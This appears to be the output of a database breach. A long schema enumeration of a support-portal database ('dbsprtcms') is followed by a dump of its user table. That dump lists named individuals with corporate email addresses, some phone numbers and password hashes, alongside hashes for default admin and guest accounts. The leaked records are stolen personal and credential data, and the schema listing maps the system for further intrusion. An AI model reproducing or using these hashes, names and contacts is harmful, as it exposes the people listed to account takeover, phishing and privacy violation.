| svtr_jitter_time_ryg | int |
| svtr_latency | nvarchar |
| svtr_latency_ryg | int |
| svtr_long_distance_enabled | nvarchar |
| svtr_long_distance_enabled_ryg | int |
| svtr_mean_opinion_score | nvarchar |
| svtr_mean_opinion_score_ryg | int |
| svtr_mos_codec_percent | nvarchar |
| svtr_mos_delay_percent | nvarchar |
| svtr_mos_jitter_percent | nvarchar |
| svtr_mos_packet_loss_percent | nvarchar |
| svtr_number_ported | nvarchar |
| svtr_number_ported_ryg | int |
| svtr_packet_loss_percent | nvarchar |
| svtr_packet_loss_percent_ryg | int |
| svtr_packet_loss_size | nvarchar |
| svtr_packet_loss_size_ryg | int |
| svtr_packet_loss_time | nvarchar |
| svtr_packet_loss_time_ryg | int |
| svtr_post_dial_delay | nvarchar |
| svtr_post_dial_delay_ryg | int |
| svtr_post_pick_delay | nvarchar |
| svtr_post_pick_delay_ryg | int |
| svtr_service_device_guid | char |
| svtr_sf_degradation_cause | nvarchar |
| svtr_sf_dup_pckts_ncs_endpt | nvarchar |
| svtr_sf_rtp_packet_loss_type | nvarchar |
| svtr_softswitch_configured | nvarchar |
| svtr_softswitch_configured_ryg | int |
| svtr_voicemail_enabled | nvarchar |
| svtr_voicemail_enabled_ryg | int |
+--------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_outbox
[15 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| seao_att_msg_guid | char |
| seao_bcc | varchar |
| seao_body_text | text |
| seao_cc | varchar |
| seao_charset | varchar |
| seao_from | varchar |
| seao_headers | varchar |
| seao_id | int |
| seao_notafter | datetime |
| seao_notbefore | datetime |
| seao_savecopy | int |
| seao_status | char |
| seao_subject | nvarchar |
| seao_to | varchar |
| seao_type | int |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_directory
[12 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| agent_mode | int |
| agent_profile | nvarchar |
| agent_version | nvarchar |
| client_guid | nvarchar |
| client_id | nvarchar |
| client_name | nvarchar |
| directory_id | int |
| dna_server_name | nvarchar |
| external_connection | nvarchar |
| ip_address | nvarchar |
| last_modified | datetime |
| user_guid | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_devices
[5 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| svd_datetime | datetime |
| svd_deviceid | nvarchar |
| svd_pass | nvarchar |
| svd_testresults | nvarchar |
| svd_workorder | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Processor
[9 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pName | nvarchar |
| pNumberOfProcessors | nvarchar |
| pProcessor | nvarchar |
| pProcessorArchitecture | nvarchar |
| pProcessorLevel | nvarchar |
| pProcessorRevision | nvarchar |
| pProcessorType | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_instances
[3 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| nc_instances_guid | char |
| nc_instances_heartbeat | datetime |
| nc_instances_nwid | char |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_prefs
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ssp_description | nvarchar |
| ssp_guid | char |
| ssp_key | nvarchar |
| ssp_tool_name | nvarchar |
| ssp_val0 | nvarchar |
| ssp_val1 | int |
| ssp_val2 | datetime |
| ssp_val3 | ntext |
| ssp_valtype | int |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_locks
[4 columns]
+----------------+------+
| Column | Type |
+----------------+------+
| nc_locks_count | int |
| nc_locks_guid | char |
| nc_locks_mutex | int |
| nc_locks_type | int |
+----------------+------+
Database: dbsprtcms
Table: dbo.sprt_sma_protocol_soap
[3 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| smasp_cmd_guid | char |
| smasp_soap_request_headers | nvarchar |
| smasp_soap_url | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Uni_Cust
[8 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAssetRefSI | nvarchar |
| pLicenseAv | nvarchar |
| pPreVrReq | nvarchar |
| pSDCAsset_Uni_Cust_Binding | nvarchar |
| pSup | nvarchar |
| pTransferReq | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Exe
[8 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pExeDir | nvarchar |
| pExeFilename | nvarchar |
| pFileDescription | nvarchar |
| pFileVersion | nvarchar |
| pProductName | nvarchar |
| pProductVersion | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_zip
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| sccz_field_name | nvarchar |
| sccz_file_data | image |
| sccz_file_name | nvarchar |
| sccz_file_size | int |
| sccz_file_type | nvarchar |
| sccz_guid | char |
| sccz_owner | char |
| sccz_res_field | nvarchar |
| sccz_row_guid | char |
| sccz_timestamp | datetime |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_data_downloads
[6 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| addl_client_guid | nvarchar |
| addl_content_guid | char |
| addl_content_version | int |
| addl_download_time | datetime |
| addl_http_status | nchar |
| addl_user_guid | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_tests
[13 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| svt_access_time | datetime |
| svt_buddybox | nvarchar |
| svt_data_source | nvarchar |
| svt_get_time | datetime |
| svt_id | int |
| svt_macids | nvarchar |
| svt_override | nvarchar |
| svt_post_time | datetime |
| svt_prevurl | nvarchar |
| svt_request_time | datetime |
| svt_state | nvarchar |
| svt_techid | nvarchar |
| svt_workorder | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_users_info
[6 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| email | nvarchar |
| first_name | nvarchar |
| last_name | nvarchar |
| phone | varchar |
| room | varchar |
| user_name | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_queue
[13 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| seaq_analyst | nvarchar |
| seaq_esc_guid | char |
| seaq_guid | char |
| seaq_id | int |
| seaq_iss_guid | char |
| seaq_pref_an | nvarchar |
| seaq_queue_in | nvarchar |
| seaq_queue_name | nvarchar |
| seaq_queue_out | nvarchar |
| seaq_status | int |
| seaq_time_closed | datetime |
| seaq_time_in | datetime |
| seaq_time_picked | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_sequences
[7 columns]
+-------------------+---------+
| Column | Type |
+-------------------+---------+
| ads_incrementby | int |
| ads_maxvalue | int |
| ads_minvalue | int |
| ads_row_guid | char |
| ads_sequence_name | varchar |
| ads_sequence_no | int |
| ads_starts_with | int |
+-------------------+---------+
Database: dbsprtcms
Table: dbo.ClassProperties
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| columnId | int |
| CpObjectID | char |
| objectID | nchar |
| propertyAttributes | int |
| propertyDescription | nvarchar |
| propertyName | nvarchar |
| propertyOrder | int |
| propertySize | int |
| propertyTable | nvarchar |
| propertyType | int |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_property_map
[4 columns]
+----------------------+------+
| Column | Type |
+----------------------+------+
| category_guid | char |
| category_id | int |
| category_property_id | int |
| property_id | int |
+----------------------+------+
Database: dbsprtcms
Table: dbo.sprt_si_issue_type
[6 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| siit_attributes | int |
| siit_classification | nvarchar |
| siit_guid | char |
| siit_lastmod | datetime |
| siit_name | nvarchar |
| siit_xml | ntext |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_asset_class
[5 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| adac_class_display | nvarchar |
| adac_class_id | char |
| adac_class_name | char |
| adac_class_type | char |
| adac_class_xml | ntext |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_languagemap_copy20_july_07
[6 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| default_slc | char |
| sclm_digit_Code | char |
| sclm_folder_guid | char |
| sclm_iso_code | char |
| sclm_language_name | nvarchar |
| sclm_row_guid | char |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_permission
[5 columns]
+----------------+------+
| Column | Type |
+----------------+------+
| scp_group | char |
| scp_group_guid | char |
| scp_guid | char |
| scp_perm_mask | int |
| scp_row_guid | char |
+----------------+------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_type
[8 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| scct_attributes | int |
| scct_content_type_guid | char |
| scct_description | nvarchar |
| scct_hdr_image_path | nvarchar |
| scct_large_image_path | nvarchar |
| scct_row_guid | char |
| scct_small_image_path | nvarchar |
| scct_title | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_metric_definition
[11 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| md_created_date | datetime |
| md_interval_unit | nvarchar |
| md_metric | nvarchar |
| md_metric_def_guid | char |
| md_metric_long_desc | ntext |
| md_metric_sql_mssql | nvarchar |
| md_metric_sql_oracle | nvarchar |
| md_product | nvarchar |
| md_product_guid | char |
| md_type | nvarchar |
| md_version | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_profile_categories
[5 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| cpc_category_attrib | int |
| cpc_category_desc | nvarchar |
| cpc_category_guid | char |
| cpc_category_name | nvarchar |
| cpc_profile_element | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_attachments
[10 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| seaa_att_guid | char |
| seaa_att_type | int |
| seaa_data | image |
| seaa_description | varchar |
| seaa_displayname | varchar |
| seaa_disposition | varchar |
| seaa_filename | nvarchar |
| seaa_mime_subtype | varchar |
| seaa_mime_type | varchar |
| seaa_msg_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ht_feature
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| available | int |
| code | nvarchar |
| descriptions | nvarchar |
| displaymode | int |
| feature_guid | char |
| htorder | int |
| name | nvarchar |
| sprt_feature_id | int |
| type | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_property_info
[4 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| descriptions | nvarchar |
| property | nvarchar |
| property_info_guid | char |
| sprt_property_info_id | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_collection_hist
[5 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| agch_gather_date | datetime |
| agch_profile_attr | nvarchar |
| agch_total_clients | int |
| agch_total_machines | int |
| agch_total_users | int |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.Activators
[6 columns]
+----------------+-------+
| Column | Type |
+----------------+-------+
| activatorType | int |
| data | ntext |
| dataLength | int |
| enabled | int |
| executionOrder | int |
| objectID | nchar |
+----------------+-------+
Database: dbsprtcms
Table: dbo.sprt_systune_survey
[11 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| stsu_answer1 | int |
| stsu_answer10 | nvarchar |
| stsu_answer2 | int |
| stsu_answer3 | int |
| stsu_answer4 | int |
| stsu_answer5 | int |
| stsu_answer6 | int |
| stsu_answer7 | int |
| stsu_answer8 | nvarchar |
| stsu_answer9 | nvarchar |
| stsu_session_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_bulletin_details
[8 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| spbd_applied | int |
| spbd_bulletin_id | nvarchar |
| spbd_pd_package_version | nvarchar |
| spbd_row_guid | char |
| spbd_scan_enabled | int |
| spbd_status | int |
| spbd_timestamp | datetime |
| spbd_vulnerable | int |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_user_brand_data
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| brand_guid | char |
| brand_row_guid | char |
| elem_data | nvarchar |
| elem_name | nvarchar |
| elem_order | int |
| elem_type | nvarchar |
| elem_value | nvarchar |
| enabled | int |
| location | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_users
[14 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| display_name | nvarchar |
| domain | nvarchar |
| email | nvarchar |
| external_connection | nvarchar |
| first_name | nvarchar |
| last_active | datetime |
| last_name | nvarchar |
| password | nvarchar |
| phone | nvarchar |
| url | nvarchar |
| user_guid | char |
| user_id | int |
| user_name | nvarchar |
| user_type | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Client_UI
[3 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | nchar |
| pLanguage | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_PhysicalDrive
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pInterfaceType | nvarchar |
| pManufacturer | nvarchar |
| pMediaType | nvarchar |
| pModel | nvarchar |
| pSize | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_trigger_filter_log
[19 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| stl_created_date | datetime |
| stl_custom_param1 | nvarchar |
| stl_custom_param2 | nvarchar |
| stl_definition | nvarchar |
| stl_guid | varchar |
| stl_hotlead | int |
| stl_id | int |
| stl_invoke_type | nvarchar |
| stl_last_modified | datetime |
| stl_name | nvarchar |
| stl_order | int |
| stl_queue | nvarchar |
| stl_status | nvarchar |
| stl_type | nvarchar |
| stl_user_email_addr | nvarchar |
| stl_user_ip | nvarchar |
| stl_user_name | nvarchar |
| stl_user_page | nvarchar |
| stl_user_type | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_moto
[25 columns]
+--------------------------+---------+
| Column | Type |
+--------------------------+---------+
| svtr_adminStatus | varchar |
| svtr_adminStatus_ryg | int |
| svtr_creditLimit | varchar |
| svtr_creditLimit_ryg | int |
| svtr_eventLimit | varchar |
| svtr_eventLimit_ryg | int |
| svtr_ip | varchar |
| svtr_ip_ryg | int |
| svtr_ippv_in_billing | varchar |
| svtr_ippv_in_billing_ryg | int |
| svtr_ippvEnabled | varchar |
| svtr_ippvEnabled_ryg | int |
| svtr_mac | varchar |
| svtr_mac_ryg | int |
| svtr_operStatus | varchar |
| svtr_operStatus_ryg | int |
| svtr_pkgname | varchar |
| svtr_pkgname_ryg | int |
| svtr_reversePower | varchar |
| svtr_reversePower_ryg | int |
| svtr_serial | varchar |
| svtr_serial_ryg | int |
| svtr_service_device_guid | char |
| svtr_type | varchar |
| svtr_type_ryg | int |
+--------------------------+---------+
Database: dbsprtcms
Table: dbo.sprt_live_direct
[8 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| id | int |
| opid | int |
| passcode | varchar |
| redeemed | varchar |
| smartissue_guid | varchar |
| time_redeemed | datetime |
| timestamp | datetime |
| ttl | int |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_SerialPort
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pName | nvarchar |
| pProviderType | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SMA_UserInfo
[14 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| elementNum | int |
| incidentID | char |
| pbirth_day | nvarchar |
| pbirth_month | nvarchar |
| pbirth_year | nvarchar |
| pfirst_name | nvarchar |
| plast_name | nvarchar |
| psecret_question | nvarchar |
| psecret_question_answer | nvarchar |
| pSMA_UserInfo_Binding | nvarchar |
| puser_account_no | nvarchar |
| puser_id | nvarchar |
| puser_password | nvarchar |
| puser_phone | nvarchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_analyst_counter
[24 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| cac_analyst_name | nvarchar |
| cac_data1 | nvarchar |
| cac_data2 | nvarchar |
| cac_event | char |
| cac_event_data | nvarchar |
| cac_event_time | datetime |
| cac_id | int |
| cac_modified_time | datetime |
| cac_no1 | int |
| cac_no2 | int |
| cac_no_active | bigint |
| cac_no_auto_escalatation | int |
| cac_no_chat_handled | int |
| cac_no_escalated_in | int |
| cac_no_escalated_out | int |
| cac_no_win_available | int |
| cac_no_win_open | int |
| cac_no_win_working | int |
| cac_session_guid | char |
| cac_session_time | datetime |
| cac_time1 | datetime |
| cac_total_handle_time | bigint |
| cac_total_time_available | bigint |
| cac_window | int |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_script_category_map
[4 columns]
+---------------+------+
| Column | Type |
+---------------+------+
| category_guid | char |
| category_id | int |
| script_guid | char |
| script_id | int |
+---------------+------+
Database: dbsprtcms
Table: dbo.sprt_si_route
[11 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| sir_act_guid_dst | char |
| sir_act_guid_src | char |
| sir_iss_type | char |
| sir_options | char |
| sir_que_guid_dst | char |
| sir_que_guid_src | char |
| sir_route_comment | nvarchar |
| sir_route_condition | nvarchar |
| sir_route_node | char |
| sir_route_node_seq | int |
| sir_route_script | ntext |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cts_config
[9 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| sccn_attributes | int |
| sccn_config_data | ntext |
| sccn_enabled | int |
| sccn_integration_desc | nvarchar |
| sccn_integration_id | nvarchar |
| sccn_integration_name | nvarchar |
| sccn_integration_type | int |
| sccn_last_modified | datetime |
| sccn_order | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_msi_packages
[10 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| msi_p_32bit_exists | int |
| msi_p_counter | bigint |
| msi_p_deploy_date | datetime |
| msi_p_file_name | nvarchar |
| msi_p_package_data | image |
| msi_p_package_date | datetime |
| msi_p_package_name | nvarchar |
| msi_p_package_size | bigint |
| msi_p_product_code | char |
| msi_p_status | int |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_rpcnames
[9 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| nc_rpcn_desc | nvarchar |
| nc_rpcn_disp_name | nvarchar |
| nc_rpcn_id | int |
| nc_rpcn_name | nvarchar |
| nc_rpcn_param_types | nvarchar |
| nc_rpcn_params | nvarchar |
| nc_rpcn_product | int |
| nc_rpcn_rowguid | char |
| nc_rpcn_url | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_SoundDevice
[7 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
| pProductName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_NetworkIdentification
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDomain | nvarchar |
| pHostName | nvarchar |
| pMacID | nvarchar |
| pName | nvarchar |
| pTCPIP_Address | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_db_default_install_hist
[10 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| dih_build_version | nvarchar |
| dih_id | bigint |
| dih_inserted_date | datetime |
| dih_row | ntext |
| dih_row_guid | char |
| dih_row_id_guid | char |
| dih_row_length | int |
| dih_row_order | bigint |
| dih_table_name | varchar |
| dih_vendor | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_log
[7 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| id | int |
| logged | datetime |
| message_from | nvarchar |
| message_text | nvarchar |
| message_to | nvarchar |
| message_type | nvarchar |
| room | varchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_link_prod_family
[3 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| splpf_family_id | int |
| splpf_prod_id | int |
| splpf_row_guid | char |
+-----------------+------+
Database: dbsprtcms
Table: dbo.SDCAsset_Drives
[5 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDriveName | nvarchar |
| pTotalCapacity | decimal |
| pTotalFreeSpace | decimal |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_data_deployment
[6 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| sadd_description | nvarchar |
| sadd_keyname | nvarchar |
| sadd_keypath | nvarchar |
| sadd_keytype | nvarchar |
| sadd_keyvalue | ntext |
| sadd_row_guid | char |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_install_history
[9 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| saih_client_guid | char |
| saih_errortext | nvarchar |
| saih_host_name | nvarchar |
| saih_ip_address | nvarchar |
| saih_operation | nvarchar |
| saih_result | int |
| saih_time | datetime |
| saih_user_name | nvarchar |
| saih_version | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_OS
[7 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | nchar |
| pName | nvarchar |
| pOSName | nvarchar |
| pOSType | nvarchar |
| pOSVersion | nvarchar |
| pSvcPack | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_transaction
[6 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| nc_nct_cpe_guid | char |
| nc_nct_end_time | datetime |
| nc_nct_guid | char |
| nc_nct_init_time | datetime |
| nc_nct_last_active_time | datetime |
| nc_nct_start_time | datetime |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_PhysicalMemory
[10 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| elementNum | int |
| incidentID | nchar |
| pBankLabel | nvarchar |
| pCapacity | nvarchar |
| pDataWidth | int |
| pDescription | nvarchar |
| pDeviceLocator | nvarchar |
| pName | nvarchar |
| pTag | nvarchar |
| pTotalWidth | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_kernel
[26 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| sik_client_guid | char |
| sik_connectivity | nvarchar |
| sik_created_by | nvarchar |
| sik_creator_email_addr | nvarchar |
| sik_creator_guid | char |
| sik_disposition | nvarchar |
| sik_ext_ids | nvarchar |
| sik_iss_guid | char |
| sik_iss_id | int |
| sik_iss_origin | varchar |
| sik_iss_type | char |
| sik_long_desc | nvarchar |
| sik_prod_id | int |
| sik_reopen_count | int |
| sik_severity | int |
| sik_short_desc | nvarchar |
| sik_status | nvarchar |
| sik_t_closed | datetime |
| sik_t_created | datetime |
| sik_t_first_disp | datetime |
| sik_t_last_disp | datetime |
| sik_t_modified | datetime |
| sik_t_reopened | datetime |
| sik_user_email_addr | nvarchar |
| sik_user_guid | char |
| sik_user_name | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_metrics
[6 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| mrs_created_date | datetime |
| mrs_end_date | datetime |
| mrs_metric_def_guid | char |
| mrs_metric_guid | char |
| mrs_metric_value | nvarchar |
| mrs_start_date | datetime |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_pcsoln_solutions
[8 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| pcs_sl_desc | nvarchar |
| pcs_sl_header | nvarchar |
| pcs_sl_img | image |
| pcs_sl_kcguid | char |
| pcs_sl_kcurl | nvarchar |
| pcs_sl_name | nvarchar |
| pcs_sl_rmguid | char |
| pcs_sln_guid | char |
+---------------+----------+
USER DB:
id,url,phone,email,domain,password,last_name,user_type,user_name,first_name,last
_active,display_name,external_connection
-41F4-A361-69FDBD51E541,<blank>,None,admin@email.address,None,e74f9c64ec87e158fe
9b3a16689a1320,Account,<blank>,admin,Admin,NULL,NULL,portalserver
-42E1-ABAF-698D6C5AC6C2,<blank>,None,analysttier1@email.address,None,6eae4020361
5d3f4856636a342111709,Account,<blank>,analysttier1,Analysttier1,NULL,NULL,portal
server
-42E1-ABAF-698D6C5AC6C3,<blank>,None,analysttier2@email.address,None,5db7f00abf6
b47017ab1325899fd885a,Account,<blank>,analysttier2,Analysttier2,NULL,NULL,portal
server
-4eb9-BF84-0FF4F63F4F02,<blank>,None,author@email.address,None,d50afb6ec7b250116
4b80a0480596ded,Account,<blank>,author,Author,NULL,NULL,portalserver
-4426-8FDD-F5F63403108E,<blank>,None,guest@email.address,None,fe4ceeb01d43a6c29d
8f4fe93313c6c1,Account,<blank>,guest,Guest,NULL,NULL,portalserver
-4148-A8B7-518EF1FE3F31,<blank>,None,admin@email.address,None,c010bad561cd42f60b
df2db5f6b999a5,Account,<blank>,reportuser,Report User,NULL,NULL,portalserver
-42E1-ABAF-698D6C5AC6C4,<blank>,None,supervisor@email.address,None,ab901acd79d1d
8c73aac1e369e1c1ebb,Account,<blank>,supervisor,Supervisor,NULL,NULL,portalserver
-406f-9623-87A1D5B46F19,<blank>,None,approver@email.address,None,44f9367c870222a
0a8be2ad590d18a77,Account,<blank>,approver,Approver,NULL,NULL,portalserver
-48b4-818e-07cf255dc7a7,<blank>,541-335-5434,kevin_kerwien@symantec.com,Symantec
,5dc51c19c58ff79e7c03302c6f3ab971,Kerwien,<blank>,kevin_kerwien,Kevin,NULL,NULL,
NULL
a0bb-443a-9cdb-2268ba4d1a55,<blank>,EMPROV,david_harris@symantec.com,Symantec,48
cf33b765fa2de137b6bf535ce7daeb,Harris,<blank>,045447,David,NULL,NULL,NULL
8-4fc8-82dc-29b02f2c430b,<blank>,<blank>,ext@sym.com,None,425b43e10aa63020ca2776
7128804316,Customer,<blank>,External_Customer,External,NULL,NULL,NULL
E6-4CFA-9E0E-45060C4B7DDD,NULL,NULL,Adel.Bencheikh@nl.fujitsu.com,Symantec,edc7f
d93a5c81bc2414feb8292e433d5,Bencheikh,NULL,Adel_Bencheikh,Adel,NULL,NULL,NULL
c81b-4594-8f9e-7436427a68c1,03/05/2010 - SPJ,EMPROV,Scott_Steinkritz@symantec.co
m,Symantec,0c08b42d25ce618ae3ffe1532c636499,Steinkritz,<blank>,103358,Scott,NULL
,NULL,NULL
2A-4D22-A442-B5249EB513C7,NULL,NULL,Adrien.Lafferreire@nl.fujitsu.com,Symantec,9
2ea459878638fd8a37cf8ec1c04297e,Lafferreire,NULL,Adrien_Lafferreire,Adrien,NULL,
NULL,NULL
DE-4A90-A34D-CD9FE6F5F07C,NULL,NULL,Adrien.van.Langenhove@nl.fujitsu.com,Symante
c,c656136ec47cd1540f118098192a6c8a,van Langenhove,NULL,Adrien_van Langenhove,Adr
ien,NULL,NULL,NULL
0322-49a6-a318-d8b9ddbe6354,CRQ000000258708-VMD-16/05/11,503 432 1566,hoa_k_tran
@symantec.com,<blank>,3645484eb5baaadef008dba86b3d13c0,Tran,<blank>,020855,Hoa K
,NULL,NULL,NULL
B3-4616-98D6-93F793B3098A,NULL,NULL,aaugusto@sercom.com.br,Sercom,d8de19c4e99492
37f17d04bc8b53de87,Augusto,NULL,Alan_Augusto,Alan,NULL,NULL,NULL
41-4966-8422-D28585AB77DA,NULL,NULL,Alcides.Jackson@nl.fujitsu.com,Symantec,9db4
aaddd2564751b9ba4ffbd352902d,Jackson,NULL,Alcides_Jackson,Alcides,NULL,NULL,NULL
A6-470A-8553-1F48853648A2,<blank>,<blank>,Alessandro.Mezzogori@nl.fujitsu.com,Sy
mantec,9f4f56d30263cb2b1487d7c7ea5074c1,Mezzogori,<blank>,Alessandro_Mezzogori,A
lessandro,NULL,NULL,NULL
b0a-43a0-a2c8-68792509255d,<blank>,<blank>,ken_schneider@symantec.com,Symantec,4
a226e8fbe17ac3b72e497407265c32e,Schneider,<blank>,ken_schneider,Ken,NULL,NULL,NU
LL
E4-4AC8-A5E9-D6B146F09F38,NULL,NULL,Alexander.Rekelhof@nl.fujitsu.com,Symantec,c
615ea57dd574f16cb4f927b0c5ccade,Rekelhof,NULL,Alexander_Rekelhof,Alexander,NULL,
NULL,NULL
8A-4E91-8649-E3B4EC2C8319,<blank>,<blank>,alexander_trinkis@symantec.com,Symante
c,39e466230510adf83da38f7f1cbfae69,Trinkis,<blank>,Alexander_Trinkis,Alexander,N
ULL,NULL,NULL
95-4CC6-A721-0B5280BF8F44,NULL,NULL,Alexandre.leger@nl.fujitsu.com,Symantec,21bc
f508f6ee65e499711cf6813ddc1f,Leger,NULL,Alexandre_Leger,Alexandre,NULL,NULL,NULL
B6-4AEB-90BA-6F73017AD9A9,NULL,NULL,Alexandre.Mauche-Sigueier@nl.fujitsu.com,Sym
antec,aa68d64b0a640acef43648a9900230c6,Mauche-Sigueier,NULL,Alexandre_Mauche-Sig
ueier,Alexandre,NULL,NULL,NULL
8E-4F29-957D-0172961F0F54,NULL,NULL,amacias@soportec.com.mx,Soportec,5070e0c7a14
e6ac8310c82ca35f7ddc2,Macias,NULL,Alina_Macias,Alina,NULL,NULL,NULL
